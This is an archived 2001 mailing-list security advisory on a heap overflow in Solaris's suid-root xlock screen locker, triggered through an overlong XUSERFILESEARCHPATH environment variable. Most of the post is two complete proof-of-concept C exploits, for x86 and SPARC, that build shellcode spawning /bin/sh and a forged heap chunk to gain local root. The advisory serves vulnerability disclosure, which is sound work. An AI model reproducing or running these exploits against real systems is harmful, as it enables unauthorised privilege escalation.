[EXPL] Solaris Xlock Heap Overflow Vulnerability (Exploit, XUSERFILESEARCHPATH)
From: support@securiteam.comDate: 08/16/01
- Previous message: support@securiteam.com: "[NT] pcAnywhere Vulnerable to a DoS (Multiple Connections)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Subject: [EXPL] Solaris Xlock Heap Overflow Vulnerability (Exploit, XUSERFILESEARCHPATH) Message-Id: <20010816061057.D7D14138BF@mail.der-keiler.de> Date: Thu, 16 Aug 2001 08:10:57 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Solaris Xlock Heap Overflow Vulnerability (Exploit, XUSERFILESEARCHPATH)
------------------------------------------------------------------------
SUMMARY
The NSFOCUS Security Team has found a heap buffer overflow vulnerability
in the xlock shipped in Solaris system. This problem arises when handling
some environment variables. Exploitation gives a local attacker root
privileges.
DETAILS
Vulnerable systems:
Sun Solaris 2.6 (SPARC/x86)
Sun Solaris 7 (SPARC/x86)
Sun Solaris 8 (SPARC/x86)
Xlock is a screen-locking tool of Solaris OpenView. It locks the X server
until a password is entered. It is installed suid root by default.
Due to a lack of boundary checking in some environment variable handling,
an attacker could overwrite dynamic memory boundary of heap area, run
arbitrary code as root with carefully constructed overflow data.
The problem is within these two environment variables: "XFILESEARCHPATH"
and "XUSERFILESEARCHPATH". Xlock calls malloc() to allocate 1024 bytes
memory and save the environment variable value in this dynamic memory. But
xlock does not provide length check of environment variable when copying.
In case that these two environment variables are set to be a string longer
than 1024 bytes, a heap overflow might occur. Adjacent dynamic memory
boundary tags could be overwritten, and segment fault would occur when
malloc() is called next time. Some special "feature" of libc
malloc()/free() implementation could be used to rewrite arbitrary memory
like saved returned address and function pointer or other important data
with carefully formed overflow data.
Exploiting this vulnerability successfully would give an attacker root
privilege.
Exploit:
/*
* sol_x86_xlockex.c - Proof of Concept Code for xlock heap overflow bug.
* Copyright (c) 2001 - Nsfocus.com
*
* Tested in Solaris 8 x86.
*
* DISCLAIMS:
* This is a proof of concept code. This code is for test purpose
* only and should not be run against any host without permission from
* the system administrator.
*
* NSFOCUS Security Team <security@nsfocus.com>
* http://www.nsfocus.com
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <sys/types.h>
#define RETLOC 0x080463c8 /* default retrun address location (Solaris 8
x86) */
#define SP 0x08047ffc /* default "bottom" stack address (Solaris 8
x86) */
#define VULPROG "/usr/openwin/bin/xlock"
char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x28\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x8b\xec\x83\xec\x64\x33\xd2\xc6\x45\xce\x9a\x89"
"\x55\xcf\x89\x55\xd3\xc6\x45\xd3\x07\xc6\x45\xd5"
"\xc3\x89\x55\xfc\x83\xed\x32\x33\xc0\x50\x50\xb0"
"\xca\xff\xd5\x83\xc4\x08\x31\xc0\x50\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89"
"\xe2\x50\x52\x53\xb0\x3b\xff\xd5";
int
main(int argc, char **argv)
{
char buf[2048], fake_chunk[48];
long retaddr, sp_addr = SP;
char *arg[24], *env[24];
long retloc = RETLOC;
unsigned int *ptr;
char ev1[]="XUSERFILESEARCHPATH=";
long ev1_len;
long overbuflen = 1024;
if (argc > 1) /* adjust retloc */
retloc += atoi(argv[1]);
bzero(buf, sizeof(buf));
ev1_len = strlen(ev1);
memcpy(buf, ev1, ev1_len);
memset(buf + ev1_len, 'A', overbuflen + sizeof(fake_chunk));
arg[0] = VULPROG;
arg[1] = NULL;
env[0] = shellcode; /* put shellcode in env */
env[1] = buf; /* put overflow environ */
env[2] = NULL; /* end of env */
/* get the not exact shellcode address :) */
retaddr = sp_addr - strlen(VULPROG) - 1
- strlen("i86pc") - 1
- strlen(buf) - 1
- strlen(shellcode) - 1;
printf("Using RET address = 0x%lx\n", retaddr);
printf("Using retloc = 0x%lx \n", retloc);
ptr = (unsigned int *) fake_chunk;
memset(fake_chunk, '\xff', sizeof(fake_chunk));
*(ptr + 0) = 0xfffffff9;
*(ptr + 2) = retaddr;
*(ptr + 8) = retloc - 8;
memcpy(buf + ev1_len + overbuflen, fake_chunk,
sizeof(fake_chunk));
execve(VULPROG, arg, env);
perror("execle");
return(1);
} /* End of main */
/*
* sol_sparc_xlockex.c - Proof of Concept Code for xlock heap overflow
bug.
* Copyright (c) 2001 - Nsfocus.com
*
* Tested in Solaris 2.6/7/8 SPARC
*
* DISCLAIMS:
* This is a proof of concept code. This code is for test purpose
* only and should not be run against any host without permission from
* the system administrator.
*
* NSFOCUS Security Team <security@nsfocus.com>
* http://www.nsfocus.com
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/systeminfo.h>
#define RETLOC 0xffbee8c4 /* default "return address" location (Solaris
7) */
#define SP 0xffbefffc /* default "bottom" stack address (Solaris
7/8) */
#define VULPROG "/usr/openwin/bin/xlock"
#define NOP 0xaa1d4015 /* "xor %l5, %l5, %l5" */
char shellcode[] = /* from scz's shellcode for SPARC
*/
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\xaa\x1d\x40\x15"
"\x81\xc3\xe0\x14\xaa\x1d\x40\x15\xaa\x1d\x40\x15\x90\x08\x3f\xff"
"\x82\x10\x20\x8d\x91\xd0\x20\x08\x90\x08\x3f\xff\x82\x10\x20\x17"
"\x91\xd0\x20\x08\x20\x80\x49\x73\x20\x80\x62\x61\x20\x80\x73\x65"
"\x20\x80\x3a\x29\x7f\xff\xff\xff\x94\x1a\x80\x0a\x90\x03\xe0\x34"
"\x92\x0b\x80\x0e\x9c\x03\xa0\x08\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\xc0\x2a\x20\x07\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f"
"\x82\x10\x20\x01\x91\xd0\x20\x08\x2f\x62\x69\x6e\x2f\x73\x68\xff";
/* get current stack point address */
long
get_sp(void)
{
__asm__("mov %sp,%i0");
}
long
get_shelladdr(long sp_addr, char **arg, char **env)
{
long retaddr;
int i;
char plat[256];
char pad = 0, pad1;
int env_len, arg_len, len;
/* calculate the length of "VULPROG" + argv[] */
for (i = 0, arg_len = 0; arg[i]!=NULL ; i++) {
arg_len += strlen(arg[i]) + 1;
}
/* calculate the pad nummber . */
pad = 3 - arg_len % 4;
printf("shellcode address padding = %d\n", pad);
memset(env[0], 'A', pad);
env[0][pad] = '\0';
/* get environ length */
for (i = 0, env_len = 0; env[i]!=NULL; i++) {
env_len += strlen(env[i]) + 1;
}
/* get platform info */
sysinfo(SI_PLATFORM, plat, 256);
len = arg_len + env_len + strlen(plat) + 1 + strlen(VULPROG) + 1;
printf("stack arguments len = %#x(%d)\n", len, len);
pad1 = len % 4;
if(pad1 == 3 ) pad1 = 5;
else pad1 = 4 - pad1;
printf("the padding zeros number = %d\n\n", pad1);
/* get the exact shellcode address */
retaddr = sp_addr - pad1 /* the trailing zero number */
- strlen(VULPROG) - 1
- strlen(plat) - 1 ;
for(i--;i>0;i--) retaddr -= strlen(env[i]) + 1;
printf("Using RET address = 0x%x\n", retaddr);
return retaddr;
} /* End of get_shelladdr */
int
main(int argc, char **argv)
{
char buf[2048], fake_chunk[48];
long retaddr, sp_addr = SP;
char *arg[24], *env[24];
char padding[64];
long retloc = RETLOC;
unsigned int *ptr;
char ev1[]="XUSERFILESEARCHPATH=";
long ev1_len;
long overbuflen = 1024;
if (argc > 1) /* you need adjust retloc offset in your system */
retloc += atoi(argv[1]);
arg[0] = VULPROG;
arg[1] = NULL;
bzero(buf, sizeof(buf));
ev1_len = strlen(ev1);
memcpy(buf, ev1, ev1_len);
memset(buf + ev1_len, 'A', overbuflen + sizeof(fake_chunk));
env[0] = padding; /* put padding buffer in env */
env[1] = shellcode; /* put shellcode in env */
env[2] = buf; /* put overflow environ */
env[3] = NULL; /* end of env */
/* get stack "bottom" address */
if(((unsigned char) (get_sp() >> 24)) == 0xef) { /* Solaris 2.6 */
sp_addr = SP - 0x0fbf0000;
retloc -= 0x0fbf0000;
}
retaddr = get_shelladdr(sp_addr, arg, env);
printf("Using retloc = 0x%x \n", retloc);
memset(fake_chunk, '\xff', sizeof(fake_chunk));
ptr = (unsigned int *) fake_chunk;
*(ptr + 0) = 0xfffffff9;
*(ptr + 2) = retaddr - 8;
*(ptr + 8) = retloc - 8;
memcpy(buf + ev1_len + overbuflen, fake_chunk,
sizeof(fake_chunk));
execve(VULPROG, arg, env);
perror("execle");
} /* End of main */
ADDITIONAL INFORMATION
The information has been provided by <mailto:security@nsfocus.com>
Nsfocus Security Team.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] pcAnywhere Vulnerable to a DoS (Multiple Connections)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
